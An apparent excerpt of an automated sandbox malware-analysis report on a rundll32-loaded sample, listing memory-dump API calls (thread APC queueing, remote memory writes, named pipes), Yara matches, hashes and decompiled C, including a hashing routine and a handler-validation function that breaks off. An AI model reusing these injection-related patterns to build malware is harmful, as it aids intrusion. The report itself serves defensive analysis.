                          • GetLastError.KERNEL32 ref: 01006DE7
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                          • String ID:
                          • API String ID: 2270775618-0
                          • Opcode ID: d57e7d6be501c48533432e5bc6198a1f561b7562b795e275567c9732c8e43910
                          • Instruction ID: 3f8ff2eb3ffaa9e4078ef68cc8378422602804376b841a8f8aa4773ec3b296d8
                          • Opcode Fuzzy Hash: d57e7d6be501c48533432e5bc6198a1f561b7562b795e275567c9732c8e43910
                          • Instruction Fuzzy Hash: D3F03170A40302DFEB77BB289919B153BA2AB44745F104536F6D6CB1C9D7BB8090CB15
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 05B6D7D0
                          • lstrlenW.KERNEL32(?), ref: 05B6D7DE
                          • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 05B6D809
                          • lstrcpyW.KERNEL32(00000006,00000000), ref: 05B6D837
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Query$lstrcpylstrlen
                          • String ID:
                          • API String ID: 3961825720-0
                          • Opcode ID: af8654d802c0de586bfce39338f22d91be2e89cb6203660c35535930690af4e5
                          • Instruction ID: 29842fffa99c70af388f56d74be4a59809279f5c1e98b4e7a0b8baca20e4c3ed
                          • Opcode Fuzzy Hash: af8654d802c0de586bfce39338f22d91be2e89cb6203660c35535930690af4e5
                          • Instruction Fuzzy Hash: 62410872610209EFDF119FA4C989ABEBBA9FF44314F1040A9F906A7250DB79FA11DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,05B8A1E8,00000001), ref: 05B78215
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78260
                            • Part of subcall function 05B773AA: CreateThread.KERNEL32(00000000,00000000,00000000,05B7893A,05B8A174,05B80998), ref: 05B773C1
                            • Part of subcall function 05B773AA: QueueUserAPC.KERNEL32(05B7893A,00000000,?,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773D6
                            • Part of subcall function 05B773AA: GetLastError.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773E1
                            • Part of subcall function 05B773AA: TerminateThread.KERNEL32(00000000,00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773EB
                            • Part of subcall function 05B773AA: CloseHandle.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773F2
                            • Part of subcall function 05B773AA: SetLastError.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773FB
                          • GetLastError.KERNEL32(05B71FE9,00000000,00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78248
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78258
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                          • String ID:
                          • API String ID: 1700061692-0
                          • Opcode ID: 086ad2b176c3e2001a66fb9487d92c2b580748f2125e7004ad7ff5f94b6d8ec8
                          • Instruction ID: b3cdaef7d5d3ecd840ee522ef1b8801757aadbd9954e2a241626e4550545b4c2
                          • Opcode Fuzzy Hash: 086ad2b176c3e2001a66fb9487d92c2b580748f2125e7004ad7ff5f94b6d8ec8
                          • Instruction Fuzzy Hash: 52F08171349205AFE3216AA89C89A362A69EB46231B241275F936D32D0DA707C05C6B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 05B6B7E9
                          • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 05B6B829
                            • Part of subcall function 05B75312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,05B7907F,?,00000004,00000000,00000004,?), ref: 05B75330
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05B6B832
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                          • String ID:
                          • API String ID: 4036914670-0
                          • Opcode ID: bf0215445f111c69eea2ddefa599785bae65a215e02cfe08861ab91a55a2bfad
                          • Instruction ID: 9ae1201c29d69791fb40f53f1d94ea55337aefce9c75beb0f6ad732067a19684
                          • Opcode Fuzzy Hash: bf0215445f111c69eea2ddefa599785bae65a215e02cfe08861ab91a55a2bfad
                          • Instruction Fuzzy Hash: BE01AC76A40108FBEB11AA95ED45DFEBBBEFB84700F500065F951E2150EB75E904DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 05B7385A
                          • RtlNtStatusToDosError.NTDLL(C000009A), ref: 05B73891
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorFreeHeapInformationQueryStatusSystem
                          • String ID:
                          • API String ID: 2533303245-0
                          • Opcode ID: 5a1091e6b4f55ca940a7091aed8097435a8711bc8e19e10fb579cff52bcad7a7
                          • Instruction ID: cc621f9dc2629a563323bdcbb8c82c802fc825180b380f4aa4985ea7d2b9d992
                          • Opcode Fuzzy Hash: 5a1091e6b4f55ca940a7091aed8097435a8711bc8e19e10fb579cff52bcad7a7
                          • Instruction Fuzzy Hash: F1018677916128BBD7219A55890CABFBAAAEF85B50F1505A4FD2263100EB70FA00A7D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B664E3
                          • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 05B664FB
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InformationProcessQuerymemset
                          • String ID:
                          • API String ID: 2040988606-0
                          • Opcode ID: 75a299bdc2980ef934016034665bb6ee4d7e0a100d0978e410371a27165652fc
                          • Instruction ID: c0fd734a2dc7f0a0107ec2f5bec21675014af8839a1d968231e74b363e6dc342
                          • Opcode Fuzzy Hash: 75a299bdc2980ef934016034665bb6ee4d7e0a100d0978e410371a27165652fc
                          • Instruction Fuzzy Hash: F6F0F476A0022C7BDB20DA91DC49FDE7F6CEB04740F4040A1AA14E6191E774EB558BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 05B7524D
                          • SetLastError.KERNEL32(00000000,?,05B6C670,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 05B75254
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$LastStatus
                          • String ID:
                          • API String ID: 4076355890-0
                          • Opcode ID: b42336272489118eef4c2083df06edeed8b540131cfd17be9cb7125c48361805
                          • Instruction ID: 37cda74d3ebc3db1a8eb0cd116d048402275d016e2e1ff805d2095845a152bb5
                          • Opcode Fuzzy Hash: b42336272489118eef4c2083df06edeed8b540131cfd17be9cb7125c48361805
                          • Instruction Fuzzy Hash: 0EE09A3261421EBBDF225EE89C05DAE7F6AEB0C791B009051BE25D6160DB31F921DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B80327
                          • memset.NTDLL ref: 05B80336
                            • Part of subcall function 05B68E0C: memset.NTDLL ref: 05B68E1D
                            • Part of subcall function 05B68E0C: memset.NTDLL ref: 05B68E29
                            • Part of subcall function 05B68E0C: memset.NTDLL ref: 05B68E54
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                          • Instruction ID: 257e4f2ef5a989a3d0da27357c58d66419c0fa0c03d56d4655b4bc965c3bc099
                          • Opcode Fuzzy Hash: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                          • Instruction Fuzzy Hash: 00024170501B298FC775EF29C698927B7F1FF446607206E6ED6E786A90E231F489CB04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                          • Instruction ID: 57420318e8dc3f9e2b6a936c73655e96b9d80533c049bce1c3d1093a4540e590
                          • Opcode Fuzzy Hash: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                          • Instruction Fuzzy Hash: 1622847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 49%
                          			E01004BF1(void* __ecx, intOrPtr* _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				intOrPtr _v48;
                          				intOrPtr _v52;
                          				intOrPtr _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				void _v76;
                          				intOrPtr* _t226;
                          				signed int _t229;
                          				signed int _t231;
                          				signed int _t233;
                          				signed int _t235;
                          				signed int _t237;
                          				signed int _t239;
                          				signed int _t241;
                          				signed int _t243;
                          				signed int _t245;
                          				signed int _t247;
                          				signed int _t249;
                          				signed int _t251;
                          				signed int _t253;
                          				signed int _t255;
                          				signed int _t257;
                          				signed int _t259;
                          				signed int _t338;
                          				signed char* _t348;
                          				signed int _t349;
                          				signed int _t351;
                          				signed int _t353;
                          				signed int _t355;
                          				signed int _t357;
                          				signed int _t359;
                          				signed int _t361;
                          				signed int _t363;
                          				signed int _t365;
                          				signed int _t367;
                          				signed int _t376;
                          				signed int _t378;
                          				signed int _t380;
                          				signed int _t382;
                          				signed int _t384;
                          				intOrPtr* _t400;
                          				signed int* _t401;
                          				signed int _t402;
                          				signed int _t404;
                          				signed int _t406;
                          				signed int _t408;
                          				signed int _t410;
                          				signed int _t412;
                          				signed int _t414;
                          				signed int _t416;
                          				signed int _t418;
                          				signed int _t420;
                          				signed int _t422;
                          				signed int _t424;
                          				signed int _t432;
                          				signed int _t434;
                          				signed int _t436;
                          				signed int _t438;
                          				signed int _t440;
                          				signed int _t508;
                          				signed int _t599;
                          				signed int _t607;
                          				signed int _t613;
                          				signed int _t679;
                          				void* _t682;
                          				signed int _t683;
                          				signed int _t685;
                          				signed int _t690;
                          				signed int _t692;
                          				signed int _t697;
                          				signed int _t699;
                          				signed int _t718;
                          				signed int _t720;
                          				signed int _t722;
                          				signed int _t724;
                          				signed int _t726;
                          				signed int _t728;
                          				signed int _t734;
                          				signed int _t740;
                          				signed int _t742;
                          				signed int _t744;
                          				signed int _t746;
                          				signed int _t748;
                          
                          				_t226 = _a4;
                          				_t348 = __ecx + 2;
                          				_t401 =  &_v76;
                          				_t682 = 0x10;
                          				do {
                          					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                          					_t401 =  &(_t401[1]);
                          					_t348 =  &(_t348[4]);
                          					_t682 = _t682 - 1;
                          				} while (_t682 != 0);
                          				_t6 = _t226 + 4; // 0x14eb3fc3
                          				_t683 =  *_t6;
                          				_t7 = _t226 + 8; // 0x8d08458b
                          				_t402 =  *_t7;
                          				_t8 = _t226 + 0xc; // 0x56c1184c
                          				_t349 =  *_t8;
                          				asm("rol eax, 0x7");
                          				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                          				asm("rol ecx, 0xc");
                          				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                          				asm("ror edx, 0xf");
                          				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                          				asm("ror esi, 0xa");
                          				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                          				_v8 = _t685;
                          				_t690 = _v8;
                          				asm("rol eax, 0x7");
                          				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                          				asm("rol ecx, 0xc");
                          				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                          				asm("ror edx, 0xf");
                          				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                          				asm("ror esi, 0xa");
                          				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                          				_v8 = _t692;
                          				_t697 = _v8;
                          				asm("rol eax, 0x7");
                          				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                          				asm("rol ecx, 0xc");
                          				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                          				asm("ror edx, 0xf");
                          				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                          				asm("ror esi, 0xa");
                          				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                          				_v8 = _t699;
                          				asm("rol eax, 0x7");
                          				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                          				asm("rol ecx, 0xc");
                          				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                          				_t508 =  !_t357;
                          				asm("ror edx, 0xf");
                          				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                          				_v12 = _t410;
                          				_v12 =  !_v12;
                          				asm("ror esi, 0xa");
                          				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                          				asm("rol eax, 0x5");
                          				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                          				asm("rol ecx, 0x9");
                          				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                          				asm("rol edx, 0xe");
                          				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                          				asm("ror esi, 0xc");
                          				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                          				asm("rol eax, 0x5");
                          				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                          				asm("rol ecx, 0x9");
                          				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                          				asm("rol edx, 0xe");
                          				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                          				asm("ror esi, 0xc");
                          				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                          				asm("rol eax, 0x5");
                          				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                          				asm("rol ecx, 0x9");
                          				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                          				asm("rol edx, 0xe");
                          				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                          				asm("ror esi, 0xc");
                          				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                          				asm("rol eax, 0x5");
                          				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                          				asm("rol ecx, 0x9");
                          				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                          				asm("rol edx, 0xe");
                          				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                          				asm("ror esi, 0xc");
                          				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                          				asm("rol eax, 0x4");
                          				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                          				asm("rol ecx, 0xb");
                          				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                          				asm("rol edx, 0x10");
                          				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                          				_t599 = _t367 ^ _t420;
                          				asm("ror esi, 0x9");
                          				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                          				asm("rol eax, 0x4");
                          				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                          				asm("rol edi, 0xb");
                          				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                          				asm("rol edx, 0x10");
                          				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                          				_t338 = _t607 ^ _t422;
                          				asm("ror ecx, 0x9");
                          				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                          				asm("rol eax, 0x4");
                          				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                          				asm("rol esi, 0xb");
                          				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                          				asm("rol edi, 0x10");
                          				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                          				_t424 = _t734 ^ _t613;
                          				asm("ror ecx, 0x9");
                          				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                          				asm("rol eax, 0x4");
                          				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                          				asm("rol edx, 0xb");
                          				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                          				asm("rol esi, 0x10");
                          				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                          				asm("ror ecx, 0x9");
                          				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                          				asm("rol eax, 0x6");
                          				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                          				asm("rol edx, 0xa");
                          				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                          				asm("rol esi, 0xf");
                          				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                          				asm("ror ecx, 0xb");
                          				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                          				asm("rol eax, 0x6");
                          				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                          				asm("rol edx, 0xa");
                          				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                          				asm("rol esi, 0xf");
                          				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                          				asm("ror ecx, 0xb");
                          				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                          				asm("rol eax, 0x6");
                          				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                          				asm("rol edx, 0xa");
                          				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                          				asm("rol esi, 0xf");
                          				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                          				asm("ror edi, 0xb");
                          				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                          				asm("rol eax, 0x6");
                          				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                          				asm("rol edx, 0xa");
                          				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                          				_t400 = _a4;
                          				asm("rol esi, 0xf");
                          				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                          				 *_t400 =  *_t400 + _t259;
                          				asm("ror eax, 0xb");
                          				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                          				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                          				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                          				return memset( &_v76, 0, 0x40);
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                          • Instruction ID: e7cd48525948bd0ceea5e2f43cbd50dd17e57e1751a7408f2f78d3a398fb6385
                          • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                          • Instruction Fuzzy Hash: AE22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 67e13545a416f6b65bb087223d9dbd59c0a631b2fa708ba121c1bc66d7185187
                          • Instruction ID: 7abebeb59a3d40f7250fe4f76ae59556c7fe63776046687e656a87fa36139870
                          • Opcode Fuzzy Hash: 67e13545a416f6b65bb087223d9dbd59c0a631b2fa708ba121c1bc66d7185187
                          • Instruction Fuzzy Hash: 44429E34A04B45CFCB25CF69C491ABAB7F2FF49304F5885AED49A9B651D738B486CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E010084C1(long _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				short* _v32;
                          				void _v36;
                          				void* _t57;
                          				signed int _t58;
                          				signed int _t61;
                          				signed int _t62;
                          				void* _t63;
                          				signed int* _t68;
                          				intOrPtr* _t69;
                          				intOrPtr* _t71;
                          				intOrPtr _t72;
                          				intOrPtr _t75;
                          				void* _t76;
                          				signed int _t77;
                          				void* _t78;
                          				void _t80;
                          				signed int _t81;
                          				signed int _t84;
                          				signed int _t86;
                          				short* _t87;
                          				void* _t89;
                          				signed int* _t90;
                          				long _t91;
                          				signed int _t93;
                          				signed int _t94;
                          				signed int _t100;
                          				signed int _t102;
                          				void* _t104;
                          				long _t108;
                          				signed int _t110;
                          
                          				_t108 = _a4;
                          				_t76 =  *(_t108 + 8);
                          				if((_t76 & 0x00000003) != 0) {
                          					L3:
                          					return 0;
                          				}
                          				_a4 =  *[fs:0x4];
                          				_v8 =  *[fs:0x8];
                          				if(_t76 < _v8 || _t76 >= _a4) {
                          					_t102 =  *(_t108 + 0xc);
                          					__eflags = _t102 - 0xffffffff;
                          					if(_t102 != 0xffffffff) {
                          						_t91 = 0;
                          						__eflags = 0;
                          						_a4 = 0;
                          						_t57 = _t76;
                          						do {
                          							_t80 =  *_t57;
                          							__eflags = _t80 - 0xffffffff;
                          							if(_t80 == 0xffffffff) {
                          								goto L9;
                          							}
                          							__eflags = _t80 - _t91;
                          							if(_t80 >= _t91) {
                          								L20:
                          								_t63 = 0;
                          								L60:
                          								return _t63;
                          							}
                          							L9:
                          							__eflags =  *(_t57 + 4);
                          							if( *(_t57 + 4) != 0) {
                          								_t12 =  &_a4;
                          								 *_t12 = _a4 + 1;
                          								__eflags =  *_t12;
                          							}
                          							_t91 = _t91 + 1;
                          							_t57 = _t57 + 0xc;
                          							__eflags = _t91 - _t102;
                          						} while (_t91 <= _t102);
                          						__eflags = _a4;
                          						if(_a4 == 0) {
                          							L15:
                          							_t81 =  *0x100a380; // 0x0
                          							_t110 = _t76 & 0xfffff000;
                          							_t58 = 0;
                          							__eflags = _t81;
                          							if(_t81 <= 0) {
                          								L18:
                          								_t104 = _t102 | 0xffffffff;
                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                          								__eflags = _t61;
                          								if(_t61 < 0) {
                          									_t62 = 0;
                          									__eflags = 0;
                          								} else {
                          									_t62 = _a4;
                          								}
                          								__eflags = _t62;
                          								if(_t62 == 0) {
                          									L59:
                          									_t63 = _t104;
                          									goto L60;
                          								} else {
                          									__eflags = _v12 - 0x1000000;
                          									if(_v12 != 0x1000000) {
                          										goto L59;
                          									}
                          									__eflags = _v16 & 0x000000cc;
                          									if((_v16 & 0x000000cc) == 0) {
                          										L46:
                          										_t63 = 1;
                          										 *0x100a3c8 = 1;
                          										__eflags =  *0x100a3c8;
                          										if( *0x100a3c8 != 0) {
                          											goto L60;
                          										}
                          										_t84 =  *0x100a380; // 0x0
                          										__eflags = _t84;
                          										_t93 = _t84;
                          										if(_t84 <= 0) {
                          											L51:
                          											__eflags = _t93;
                          											if(_t93 != 0) {
                          												L58:
                          												 *0x100a3c8 = 0;
                          												goto L5;
                          											}
